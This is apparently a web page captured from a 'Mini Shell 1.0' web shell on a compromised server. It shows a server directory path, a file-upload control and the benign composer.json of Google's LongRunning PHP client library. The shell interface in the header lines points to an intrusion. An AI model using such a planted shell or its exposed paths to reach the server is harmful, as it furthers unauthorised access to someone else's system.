HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/vendor/google/longrunning/
Upload File :
Current File : /var/www/devs.lapieza.net/vendor/google/longrunning/composer.json
{
    "name": "google/longrunning",
    "description": "Google LongRunning Client for PHP",
    "license": "Apache-2.0",
    "minimum-stability": "stable",
    "version": "0.4.6",
    "autoload": {
        "psr-4": {
            "Google\\ApiCore\\LongRunning\\": "src/ApiCore/LongRunning",
            "Google\\LongRunning\\": "src/LongRunning",
            "GPBMetadata\\Google\\Longrunning\\": "metadata/Longrunning"
        }
    },
    "extra": {
        "component": {
            "id": "longrunning",
            "path": "LongRunning",
            "entry": null,
            "target": "googleapis/php-longrunning"
        }
    },
    "require-dev": {
        "google/gax": "^1.36.0",
        "phpunit/phpunit": "^9.0"
    }
}